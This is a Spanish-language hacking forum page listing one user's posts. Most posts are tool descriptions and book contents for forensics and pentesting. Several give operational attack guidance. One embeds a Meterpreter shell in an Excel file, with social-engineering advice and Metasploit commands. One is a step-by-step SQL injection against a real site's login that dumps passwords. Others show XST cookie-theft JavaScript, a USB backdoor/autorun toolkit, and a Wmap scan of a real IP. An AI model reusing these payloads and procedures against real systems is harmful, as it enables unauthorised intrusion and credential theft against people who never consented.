Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Stuxnet

#41

X-Ways Forensics, es un avanzado entorno de trabajo para analistas forenses que funciona sobre plataformas Windows 2000 / XP / 2003 / Vista / Seven / 2008 con tecnologías de 32 y 64 Bits.

Algunas de las características de X-Ways Forensics son:

Posibilidad de crear imágenes o copiados seguros de evidencias digitales.
Recuperación de información eliminada.
Visualizar estructuras de directorios sobre imágenes del tipo .dd.
Acceder a discos, RAIDs, e imágenes de gran tamaño (2Tb).
Soporte nativo para FAT12, FAT16, FAT32, TFAT, NTFS, Ext2, Ext3, Ext4, CDFS/ISO9660/Jolite, UDF.
Visualización y volcado de memoria RAM y memoria virtual de procesos en ejecución.
Creación de medios forenses estériles.
Generación y cálculo de firmas criptográficas (CRC32, MD4, ed2k, MD5, SHA-1, SHA-256, RipeMD.
Capacidades de búsquedas en la evidencia recolectada.
Bookmarks.
Anotaciones y un largo etc.
Para más información sobre X-Ways Forensics visita su Web oficial No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Manual oficial de usuario para X-Ways forensics (pdf) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

QuickStart Guide (pdf) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta




No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#42

Es una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

    * Una Maquina (virtual o real) con Windows
    * Microsoft Excel
    * Perl
    * El modulo Win32:OLE para Perl
    * Un archivo XML a infectar
    * El No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
    * y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:

Código: text
perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls


Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que "confié" en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

iniciamos la consola del metasploit:

Código: text
set payload windows/meterpreter/bind_tcp
set RHOST ipdelpcvictima
set RPOT 4444
exploit


#43
Cursos, manuales y libros / La Biblia de C#
Mayo 29, 2013, 06:42:37 PM

Es este excelente libro de la familia de Anaya Multimedia, se hace un análisis exhaustivo del lenguaje de programación C# un lenguaje evolucionado de C y C++, durante el avance de este libro, será posible crear su primero aplicación además de conocer diferentes aspectos de C# que lo hacen diferente ante otros lenguajes de programación de hoy en día.

La iniciativa .NET Framework de Microsoft supone el cambio más importante en la metodología del desarrollo de software para un sistema operativo de Microsoft desde la introducción de Windows. Este entorno está construido usando una arquitectura que permite a los lenguajes de software trabajar juntos, compartiendo recursos y código, para proporcionar a los programadores las herramientas necesarias para construir la siguiente generación de aplicaciones de escritorio y de Internet. Visual Studio .NET de Microsoft incluye un lenguaje completamente nuevo llamado C#. La biblia de C# le mostrará cómo escribir código usando este novísimo lenguaje. Todos los términos de lenguaje tales como declaraciones, variables, bucles de control y clases, son tratados con detalle. Además, le enseñará a usar C# para programar tareas con las que los programadores suelen enfrentarse en el mundo real. La última parte del libro explica cómo usar C# para desarrollar páginas Web, acceder a bases de datos, trabajar con objetos COM y COM+ heredados, desarrollar aplicaciones de escritorio para Windows, trabajar con varios conceptos de .NET Framework y mucho más. El principal objetivo de este libro es el desarrollo .NET usando C# como el lenguaje de implementación, y el compilador de línea de comandos C# de .NET Framework como la principal herramienta de desarrollo. Este libro fue escrito teniendo en mente tanto a los programadores novatos como a los expertos.


Capítulo 1: Introducción a C#
Capítulo 2: Escribir su primer programa en C#
Capítulo 3: Trabajar con variables
Capítulo 4: Expresiones
Capítulo 5: Cómo controlar el flujo de código
Capítulo 6: Cómo trabajar con métodos
Capítulo 7: Agrupación de datos usando estructuras
Capítulo 8: Escribir código orientado a objetos
Capítulo 9: Clases de C#
Capítulo 10: Como sobrecargar operadores
Capítulo 11: Herencia de clase
Capítulo 12: Cómo trabajar con espacios de nombre
Capítulo 13: Interfaces
Capítulo 14: Enumeraciones
Capítulo 15: Eventos y delegados
Capítulo 16: Control de excepciones
Capítulo 17: Cómo trabajar con atributos
Capítulo 18: Cómo utilizar versiones en sus clases
Capítulo 19: Cómo trabajar en código no seguro
Capítulo 20: Constructores avanzados de C#
Capítulo 21: Construir aplicaciones en WindowsForms
Capítulo 22: Construir aplicaciones web con WindowsForms
Capítulo 23: Programación de bases de datos con No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Capítulo 24: Cómo trabajar con archivos y el registro de Windows
Capítulo 25: Cómo acceder a secuencias de datos
Capítulo 26: Cómo dibujar GDI+
Capítulo 27: Cómo construir servicios web
Capítulo 28: Cómo usar C# en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Capítulo 29: Cómo construir controles personalizados
Capítulo 30: Cómo construir aplicaciones móviles
Capítulo 31: Cómo trabajar con ensamblados
Capítulo 32: Reflexión
Capítulo 33: Subprocesamiento en C#
Capítulo 34: Cómo trabajar con COM
Capítulo 35: Cómo trabajar con servicios COM+
Capítulo 36: Cómo trabajar con los servicios remotos de .NET
Capítulo 37: C# y seguridad .NET
Apéndice

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#44
>:( Joder que largo el titulo XD





Violent Python. A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers

Chapter 1: Introduction
Chapter 2: Penetration Testing with Python
Chapter 3: Forensic Investigations with Python
Chapter 4: Network Traffic Analysis with Python
Chapter 5: Wireless Mayhem with Python
Chapter 6: Web Recon With Python
Chapter 7: Antivirus Evasion with Python

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#45

Nmap 6: Network Exploration and Security Auditing Cookbook de Paulino Calderón Pale es un excelente y específico libro sobre el uso de Nmap como herramienta indispensable en proyectos de Test de Penetración.

Contenido Temático:

Chapter 1: Nmap Fundamentals

    Introduction
    Downloading Nmap from the official source code repository
    Compiling Nmap from source code
    Listing open ports on a remote host
    Fingerprinting services of a remote host
    Finding live hosts in your network
    Scanning using specific port ranges
    Running NSE scripts
    Scanning using a specified network interface
    Comparing scan results with Ndiff
    Managing multiple scanning profiles with Zenmap
    Detecting NAT with Nping
    Monitoring servers remotely with Nmap and Ndiff

Chapter 2: Network Exploration

    Introduction
    Discovering hosts with TCP SYN ping scans
    Discovering hosts with TCP ACK ping scans
    Discovering hosts with UDP ping scans
    Discovering hosts with ICMP ping scans
    Discovering hosts with IP protocol ping scans
    Discovering hosts with ARP ping scans
    Discovering hosts using broadcast pings
    Hiding our traffic with additional random data
    Forcing DNS resolution
    Excluding hosts from your scans
    Scanning IPv6 addresses
    Gathering network information with broadcast scripts

Chapter 3: Gathering Additional Host Information

    Introduction
    Geolocating an IP address
    Getting information from WHOIS records
    Checking if a host is known for malicious activities
    Collecting valid e-mail accounts
    Discovering hostnames pointing to the same IP address
    Brute forcing DNS records
    Fingerprinting the operating system of a host
    Discovering UDP services
    Listing protocols supported by a remote host
    Discovering stateful firewalls by using a TCP ACK scan
    Matching services with known security vulnerabilities
    Spoofing the origin IP of a port scan

Chapter 4: Auditing Web Servers

    Introduction
    Listing supported HTTP methods
    Checking if an HTTP proxy is open
    Discovering interesting files and directories in various web servers
    Brute forcing HTTP authentication
    Abusing mod_userdir to enumerate user accounts
    Testing default credentials in web applications
    Brute-force password auditing WordPress installations
    Brute-force password auditing Joomla! installations
    Detecting web application firewalls
    Detecting possible XST vulnerabilities
    Detecting Cross Site Scripting vulnerabilities in web applications
    Finding SQL injection vulnerabilities in web applications
    Detecting web servers vulnerable to slowloris denial of service attacks

Chapter 5: Auditing Databases

    Introduction
    Listing MySQL databases
    Listing MySQL users
    Listing MySQL variables
    Finding root accounts with empty passwords in MySQL servers
    Brute forcing MySQL passwords
    Detecting insecure configurations in MySQL servers
    Brute forcing Oracle passwords
    Brute forcing Oracle SID names
    Retrieving MS SQL server information
    Brute forcing MS SQL passwords
    Dumping the password hashes of an MS SQL server
    Running commands through the command shell on MS SQL servers
    Finding sysadmin accounts with empty passwords on MS SQL servers
    Listing MongoDB databases
    Retrieving MongoDB server information
    Listing CouchDB databases
    Retrieving CouchDB database statistics

Chapter 6: Auditing Mail Servers

    Introduction
    Discovering valid e-mail accounts using Google Search
    Detecting open relays
    Brute forcing SMTP passwords
    Enumerating users in an SMTP server
    Detecting backdoor SMTP servers
    Brute forcing IMAP passwords
    Retrieving the capabilities of an IMAP mail server
    Brute forcing POP3 passwords
    Retrieving the capabilities of a POP3 mail server
    Detecting vulnerable Exim SMTP servers version 4.70 through 4.75

Chapter 7: Scanning Large Networks

    Introduction
    Scanning an IP address range
    Reading targets from a text file
    Scanning random targets
    Skipping tests to speed up long scans
    Selecting the correct timing template
    Adjusting timing parameters
    Adjusting performance parameters
    Collecting signatures of web servers
    Distributing a scan among several clients using Dnmap

Chapter 8: Generating Scan Reports

    Introduction
    Saving scan results in normal format
    Saving scan results in an XML format
    Saving scan results to a SQLite database
    Saving scan results in a grepable format
    Generating a network topology graph with Zenmap
    Generating an HTML scan report
    Reporting vulnerability checks performed during a scan

Chapter 9: Writing Your Own NSE Scripts

    Introduction
    Making HTTP requests to identify vulnerable Trendnet webcams
    Sending UDP payloads by using NSE sockets
    Exploiting a path traversal vulnerability with NSE
    Writing a brute force script
    Working with the web crawling library
    Reporting vulnerabilities correctly in NSE scripts
    Writing your own NSE library
    Working with NSE threads, condition variables, and mutexes in NSE


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#46
Seguridad Wireless / Gerix Wifi Cracker
Mayo 06, 2013, 12:17:43 PM

Basicamente esta herramienta es una extension Visual de las tradicionales "macchanger", "aircrack-ng", y otras ademas que presenta un proceso automatizado de todas estas herramientas.

Requisitos:

Citaraircrack-ng
macchanger
python-qt3

Descarga:

CitarNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
tar -zxvf gerix-wifi-cracker-ng.tar.gz
cd gerix-wifi-cracker-ng
python No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#47
Bugs y Exploits / OWASP CSRFTester
Abril 25, 2013, 02:42:11 PM

Cross-Site Request Forgery (CSRF) es un ataque donde la victima es engañada para cargar información desde o enviar información a la aplicación Web para la que se encuentra autenticado actualmente. El problema es que la aplicación Web no tiene forma de verificar la integridad de la solicitud. El proyecto OWASP CSRFTester intenta dar a los desarrolladores la habilidad de probar sus aplicaciones para encontrar fallas de CSRF.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#48
Hacking / Evil Foca
Abril 08, 2013, 09:57:24 PM

Evil Foca (Alpha Version) es una herramienta para pentester y auditores de seguridad que tiene como fin poner a prueba la seguridad en redes de datos IPv4 / IPv6.

La herramienta es capaz de realizar distintos ataques como:

    MITM sobre redes IPv4 con ARP Spoofing y DHCP ACK Injection.
    MITM sobre redes IPv6 con Neighbor Advertisement Spoofing, Ataque SLAAC, fake DHCPv6.
    DoS (Denegación de Servicio) sobre redes IPv4 con ARP Spoofing.
    DoS (Denegación de Servicio) sobre redes IPv6 con SLAAC DoS.
    DNS Hijacking.

Automáticamente se encarga de escanear la red e identificar todos los dispositivos y sus respectivas interfaces de red, especificando sus direcciones IPv4 e IPv6 y las direcciones físicas.


Evil Foca está dividida en 4 paneles, a la izquierda el panel encargado de mostrar los equipos encontrados en la red, donde se podrá agregarlos a mano, y filtrar los resultados obtenidos.

El segundo panel, dispuesto en el centro con todos los posibles ataques a realizar con la herramienta, y a su derecha una breve descripción de cada uno de ellos.

Colocado bajo el panel anterior, se muestran los ataques que se están realizando, su configuración y su estado, permitiendo activarlo o desactivarlo.

Por último, el panel inferior donde se imprime un log de los eventos de la Evil Foca.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#49
Bugs y Exploits / Cross Site Tracing (XST)
Abril 02, 2013, 09:11:40 PM

Cross Site Tracing - XST es una vulnerabilidad que se deriva de XSS y es generada por el método  HTTP TRACE que muestra las cookies que el navegador tiene para el dominio.

El método TRACE se utiliza principalmente para fines de depuración, pero Jeremiah Grossman descubrió en 2003 que se puede llegar a montar un ataque, que es conocido como XST.

El método HTTP TRACE. Este método se utiliza/ba para debugging de los servidores Web y viene activado por defecto en muchos servers. Lo único que hace es repetir toda información enviada por el cliente al server, es algo así como un echo. Un ejemplo del método Trace sería como sigue:

Código: text
$ nc 192.168.1.1 80 -vvv
TRACE / HTTP/1.1
Host: prueba
User-Agent: prueba
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Dec 2009 17:07:16 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 50
TRACE / HTTP/1.1
Host: prueba
User-Agent: prueba

Como se observa, el servidor responde exactamente lo mismo que le enviamos en el pedido. La parte útil para el ataque, es que si armamos un pedido HTTP TRACE desde el browser a una página en la cual se utilizan cookies, el servidor nos responderá copiando las cookies de regreso. Por ejemplo, podríamos obtener el siguiente comportamiento:

Código: text
$ nc 192.168.1.1 80 -vvv
TRACE / HTTP/1.1
Host: prueba
Cookie: SID=13klj12jhlkjhdf09kasdn
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Dec 2009 17:15:26 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 73
TRACE / HTTP/1.1
Host: prueba
Cookie: SID=13klj12jhlkjhdf09kasdn


Si podemos obtener la cookie enviada por el browser a través de XSS, para qué necesitamos el método TRACE? bueno resulta ser que hay casos en los que no es posible obtener las cookies utilizando Javascript (u otro lenguaje script ejecutado en el browser).

En browsers como IE6 SP1 y posteriores o Firefox 2.0.0.5 y posteriores, existe una opción de seguridad llamada HttpOnly cookies. Cuando un servidor web envía el parámetro HttpOnly dentro de las cookies, el browser no debería permitir que las cookies sean accesibles utilizando scripts como Javascript. Esto es, si la opción HttpOnly está activada, una llamada a document.cookie nos devolverá vacío, aún cuando existan cookies. Utilizando esta propiedad se previene el robo de cookies explotando vulnerabilidades XSS, lo cual es muy bueno.

Aca es donde entra en juego el XST. A través de XST se pueden obtener cookies aún cuando está activada la característica HttpOnly. Si armamos un pedido HTTP TRACE desde el browser, éste incorporará la cookie como parte del header (la cual todavía no podemos acceder). Ahora, cuando el servidor responda al pedido TRACE, éste incluirá la cookie como parte de la respuesta....

Cómo es posible armar un pedido HTTP TRACE utilizando Javascript? distintos browsers tienen distintos métodos. Para ejemplificar, les dejo los métodos usados por los dos browsers más conocidos, IE y Firefox.

Una forma de realizar este trabajo en Internet Explorer es utilizando el control ActiveX XMLHTTP. Un ejemplo de cómo utilizar esto para obtener cookies es el siguiente (tomado del paper CROSS-SITE TRACING (XST) de Jeremiah Grossman):

Código: text
<script type=""text/javascript"">
<!–
function sendTrace () {
     var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
     xmlHttp.open("TRACE", "http://foo.bar",false);
     xmlHttp.send();
     xmlDoc=xmlHttp.responseText;
     alert(xmlDoc);
}
//–>
</script>
<input onclick=""sendTrace();"" request="" trace="" type="BUTTON" value=""Send" />


En firefox la función a utilizar es muy similar:

Código: text
<script type="text/javascript">
<!–
function sendTrace()
{
     xhttp=new XMLHttpRequest();
     xhttp.open("TRACE", "http://foo.bar",false);
     xhttp.send();
     xmlDoc=xhttp.responseXML;
     alert(xmlDoc);
}
//–>
</script>
<INPUT TYPE=BUTTON onclick="sendTrace();" VALUE="Send Trace Request">


El uso de estas funciones tienen una restricción: no permiten al browser conectarse a otro dominio que no sea el de la página que está mostrando. Pero esto igualmente no es problema para realizar el ataque.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#50
Python / Volatility Framework
Marzo 29, 2013, 10:23:48 PM
Volatility es un Framework con un conjunto de herramientas desarrolladas enteramente en Python con licencia GNU. Este Framework esta pensado para extraer de una imagen de un disco los datos volátiles que estaban en memoria RAM. Estas técnicas de extracción las podemos utilizar Windows y/o Linux.

Entre las características podemos mencionar las siguientes:

- Tipo de sistema, fecha y hora
- Procesos que se estaban ejecutando
- Puertos abiertos
- Puertos conectados
- DLLs cargadas por proceso
- Ficheros cargados por procesos
- Claves del registro utilizadas en los procesos
- Modulos del Kernell
- Mapa fisico de offsets a direcciones virtuales
- Direccionamiento de memoria por proceso
- Extración de ejecutables

La mayoría de plugins han sido desarrollados por Brendan Dolan (aka moyix) y pueden encontrarse, junto con una referencia al mensaje de su blog en el que realiza una pequeña introducción al uso y características del mismo, en la siguiente dirección:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Otra gran fuente de información con una recopilación de los plugins disponibles así como una breve descripción de la funcionalidad ofrecida por cada uno de ellos la podemos encontrar en:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Instalación de Volatility

Código: text
:~$ cd /usr/local
:~$ wget https://www.volatilesystems.com/volatility/1.3/Volatility-1.3_Beta.tar.gz


Ahora desempaquetamos el contenido e incluiremos un enlace simbólico al directorio obtenido, de forma que siempre apunte a la ultima versión del framework que tengamos instalada:

Código: text
:~$ tar xvzf Volatility-1.3_Beta.tar.gz
:~$ rm -f Volatility-1.3_Beta.tar.gz
:~$ ln -s Volatility-1.3_Beta/ volatility

#51
Bugs y Exploits / Inyección SQL a Login ASP
Marzo 10, 2013, 11:13:28 PM

Bien comencemos, para este tutorial utizare la página de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Este tutorial es con fines educativos y no me hago responsable del uso que le den.

En el en campo "Clave de Acceso" y "Password" del login escribimos:

Código: text
' having 1= 1--



Al hacerlo nos dara el seguiente error:


Sabemos que es vulnerable y nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave, teniendo esto regresamos a nuestro login y escribimos:

Código: text
' group by Usuario.Clave having 1 = 1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Nombre", teniendo esto regresamos a nuestro login y escribimos:

Código: text
' group by Usuario.Clave, Usuario.Nombre having 1=1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave_de_Acceso", teniendo esto regresamos a nuestro login y escribimos:

Código: text
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso having 1=1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Password", teniendo esto regresamos a nuestro login y escribimos:

Código: text
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password having 1=1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tipo_de_Usuario", teniendo esto regresamos a nuestro login y escribimos:

Código: text
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario having 1=1--


Hacemos la inyección y el siguiente error sera así:



Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tunto_de_Captura", teniendo esto regresamos a nuestro login y escribimos:

Código: text

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura having 1=1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.ESTATUS", teniendo esto regresamos a nuestro login y escribimos:

Código: text
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura, Usuario.ESTATUS having 1=1--


Como podemos observar al hacer esto nos dira "clave de acceso y/o password incorrectos" esto quiere decir que hemos terminado de buscar las tablas y columnas.


Nuestra siguiente inyección sera de esta forma:

Código: text
' union select 1,1,1,1,1,1,min(Clave_de_Acceso) from Usuario where Clave_de_Acceso > 'a'--


Esta parte tenemos 6 unos y min(LOGIN) es la posición al hacer la inyección les arroja los datos.

La posión de los unos puede varia un ejemplo podría ser:

Código: text
' union select 1,1,1,1,min(Clave_de_Acceso)1,1 from Usuario where Clave_de_Acceso > 'a'--



Curiosamente al hacer la inyección de esta forma tenemos el acceso:

Código: text
' union select 1,1,1,1,1,1,min(Password) from Usuario where Clave_de_Acceso > 'ADMIN'--




La inyección para que les arroje la password es:

Código: text
' union select 1,1,1,1,1,1,min(Password) from Usuario where Password > 'ADMIN'--


#52
Hacking / USBsploit
Marzo 07, 2013, 01:24:04 PM

USBsploit es una prueba de concepto que genera puertas traseras "reverse_tcp" (x86, x64, todos los puertos) y archivos maliciosos LNK (accesos directos). USBsploit trabaja a través de sesiones Meterpreter, es una versión modificada de Metasploit. La interfaz es un mod de SET (Social Engineer Toolkit).

Características

    Crear un Backdoor.
    Crear un LNK y un autorun.inf.
    Crear un PDF y un autorun.inf.
    Crear un Backdoor y lanzar un oyente multi-controlador para el ataque de descarga USB.
    Crear una puerta trasera, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / EXE infección.
    Crear un Backdoor, LNK a, un autorun.inf y lanzar un oyente multi-controlador de la Auto USB [run | play] / LNK infección.
    Crear una puerta trasera, un PDF, un autorun.inf y lanzar un oyente multi-controlador de la Auto USB [run | play] infección / PDF.
    Crear una puerta trasera, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / EXE infección y el ataque de descarga USB.
    Crear un Backdoor, LNK a, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / LNK infección y el ataque de descarga USB.
    Crear una puerta trasera, un PDF, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] infección / PDF y el ataque de descarga USB.
    Crear un Backdoor, LNK un PDF y un archivo. Vuelva a colocar todos los archivos EXE, PDF LNK y por los maliciosos generados o costumbres, si es posible.
    Lanzamiento de un oyente LNK (sin infección directa USB aquí) para obtener una conexión de vuelta de la unidades USB infectadas con el archivo LNK pasado generó.
    Entre Otras.

Instalacion Ubuntu

    Descargan el archivo, en mi caso será (No tienes permitido ver enlaces. Registrate o Entra a tu cuenta) y lo extraen.
    Se nos creara una carpeta llamada usbsploit  y nos dirigiremos hacia ella mediante el terminal.
    Una ves dentro de la carpeta usbsploit  le daremos permisos de ejecucion con el siguiente comando ( chmod +x  No tienes permitido ver enlaces. Registrate o Entra a tu cuenta ).
    Instalamos la tool de la siguiente forma  ( ./installer.sh ).
    Se nos instalara la tool automaticamente  y borraremos la carpeta usbsploit que si miramos dentro nos quedo vacia ya que al instalarlo los archivos se movieron de sitio.
    Cerramos todo y abrimos un nuevo terminal y escribiremos usbsploit y la tool se iniciara automaticamente

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#53
Android / OWASP GoatDroid
Febrero 24, 2013, 10:36:39 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta es un proyecto que ayudará a educar en materia de seguridad a los desarrolladores de aplicaciones Android.

Se trata de un entorno completamente funcional para aprender acerca de las vulnerabilidades y los fallos de seguridad en la extendida plataforma. El framework y la aplicación están basadas completamente en Java. No es necesario instalar un servidor web externo o un contenedor, aunque si necesitaremos MySQL, el SDK de Android y Eclipse. Cada servicio web corre en instancias Jetty embebidas y utiliza la implementación Jersey de JAX-RS.

Instalación:

1. Como comentábamos, es necesario tener previamente instalado Mysql, JDK, Eclipse y Android SDK.

2. Lo primero que haremos es crear un dispositivo virtual con un nivel 7 de API como mínimo.



3. Después importamos la base de datos FourGoats en MySQL: 'mysql -u username -p &lt; fourgoats.sql'. El fichero fourgoats.sql está dentro del directorio /databases de la carpeta GoatDroid.

4. Dentro de MySQL ejecutamos: 'create user 'goatboy'@'localhost' identified by 'goatdroid'' (si queremos indicar otra contraseña tendremos que cambiarla en el código fuente de goatdroid.jar y re-exportar.

5. En MySQL, ejecutamos : 'grant insert, delete, update, select on fourgoats.*  to goatboy@localhost'

6. Ahora que la base de datos está configurada con las tablas y los datos de ejemplo, arrancamos goatdroid.jar haciendo clic o ejecutamos 'java -jar goatdroid.jar'



7. En el menú seleccionamos 'Configure y Edit' y añadimos las rutas de Eclipse y del SDK y los dispositivos virtuales:



8. Desplegamos la carpeta FourGoats en Apps, seleccionamos v1 y pulsamos el botón 'Iniciar servicio web':



9. Pulsamos el botón para iniciar el emulador y seleccionamos nuestro dispositivo virtual:



10. Una vez arrancado el dispositivo virtual, instalamos la aplicación pulsando el botón "Push App To Device". En caso de que fallara, podemos instalar el apk nosotros directamente: 'D:\Android\android-sdk\platform-tools&gt;adb.exe install "d:\OWASP GoatDroid v0.1.2   BETA\goatdroid_apps\FourGoats\v1\android_app\FourGoats- Android Application.apk"'



11. Pinchamos en el icono creado para iniciar la aplicación y, antes de empezar a hacer nada, es necesario especificar el host y el puerto para conectarnos al servicio web. Para ello, pulsamo el botón 'Menú' y seleccionamos "Destination Info".



12. Por último, registramos y creamos una cuenta y nos loggeamos.





Se pueden descubrir vulnerabilidades de tipo:
           
Client-Side Injection
Server-Side           
Authorization Issues
Side Channel Information Leakage
Insecure           
Data Storage
Privacy Concerns                   
#54
Bugs y Exploits / Wfuzz
Febrero 06, 2013, 12:30:57 PM

Wfuzz es una herramienta destinada para la enumeración de archivos y directorios alojados en una aplicación Web.

Esta herramienta desarrollada por Edge-Security realiza ataques de fuerza bruta para la enumeración de directorios, servlets, scripts y archivos en el webserver.

Estos ataques son realizados mediante peticiones GET y POST que además de verificar la existencia de dichos recursos, posibilita la identificación de inyecciones del tipo SQL LDAP y XSS, entre otras.

Uso básico :

Código: text
python wfuzz.py -c -z file,worldlist/general/common.txt http://www.objetivo.com/FUZZ


Filtrado básico :

Código: text
python wfuzz.py -c -z file,worldlist/general/text.txt --hc 404  http://www.objetivo.com/FUZZ


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#55
Bugs y Exploits / Wmap Web Scanner Metasploit
Enero 26, 2013, 10:07:47 PM
Wmap es un framework para ejecutar escaneos contra aplicaciones Web, diseñado para ser utilizado como un plugin de MetaSploit Framework, cuenta con una arquitectura simple y no obstante sumamente potente en comparación con otras alternativas open source o comerciales que se encuentran actualmente en el mercado, la simplicidad de este plugin radica en que no depende de ningún navegador web o motor de búsqueda para capturar datos y manipularlos.

Las librerías que se deben instalar antes de proceder con la ejecución del plugin en un sistema Debian/Ubuntu son:

sudo apt-get install libxml-ruby
sudo apt-get install libxml2-dev
sudo apt-get install libxslt-dev
sudo apt-get install libnokogiri-ruby
gem install libxslt-ruby
gem install msgpack
PostgreSQL

Lo primero que haremos será crear una nueva base de datos para almacenar los resultados de análicis.


Citarstuxnet@stuxnet:~$ sudo su postgres
[sudo] password for stuxnet:
postgres@stuxnet:/home/stuxnet$ createuser metasploit -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) y
postgres@stuxnet:/home/stuxnet$ createdb --owner=metasploit metasploit

Luego en una terminal tecleamos lo siguiente:

Citarsudo /etc/init.d/./postgresql start

Luego de haber creado la base de datos abriremos una consola del metasploit y tecleamos.

Citarmsf > db_connect metasploit:[email protected]:5432/metasploit

Donde:

CitarUser: metasploit     ( reemplazar por su user )
Passwd: metasploit ( reemplazar por su password )

Luego de haber creado la base de datos cargaremos WMAP.

Citarmsf > load wmap


Una vez realizado esto vamos añadir una nueva el target (sitio) seguido de la IP.

Citarmsf > wmap_sites -a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta,199.59.148.10

Luego comprobramos si fue agregado correctamente.

Citarmsf > wmap_sites -l


Luego procedemos a covertirlo a objetivo ( Target )

Citarmsf > wmap_sites -s 0 1

Citarmsf > wmap_targets -t No tienes permitido ver enlaces. Registrate o Entra a tu cuenta,199.59.148.10

Citarmsf > set DOMIAN No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Citarmsf > wmap_targets  -l


Luego procedemos a lanzar los módulos de explotacion que serán cargados.

Citarmsf > msf > wmap_run -t


Una vez cargados los módulos procedemos a lanzarlos al sitio de destino para realizar el test de seguridad.

Citarmsf > wmap_run -e

Una vez que toda la exploracion termine vamos a comprobar si encontramos alguna vulnerabilidad.

Citarmsf > hosts -c address,svcs,vulns
#56
Hacking / Loki
Enero 25, 2013, 11:58:31 PM

Loki es una impresionante herramienta de manipulación de redes a nivel de capa 2/3 creada por Daniel Mende, René Graf y Enno Rey, Loki provee una interfaz gráfica de usuario (GUI) para realizar múltiples ataques a protocolos, permitiéndonos manipular protocolos de red para realizar ataques MITM (Man-In-The-Middle) y otras actividades maliciosas. Los protocolos soportados son:

Citar
    ARP
    HSRP, HSRPv2
    RIP
    BGP
    OSPF
    EIGRP
    WLCCP
    VRRP, VRRPv3
    BFD (Protocolo de Reenvio Bidireccional)
    LDP (Protocolo de Diustribución de Etiquetas)
    MPLS (re-etiquetado, interfaz de tunel)


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta




Videos: Funte: Un Informático en el Lado del Mal



#57


Bizploit es el primer marco de pruebas de penetración de ERP Opensource. Desarrollado por los laboratorios de investigación Onapsis, Bizploit ayuda a los profesionales de la seguridad en el No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, exploración, fases de evaluación y explotación de la vulnerabilidad de pruebas de penetración de ERP especializado.

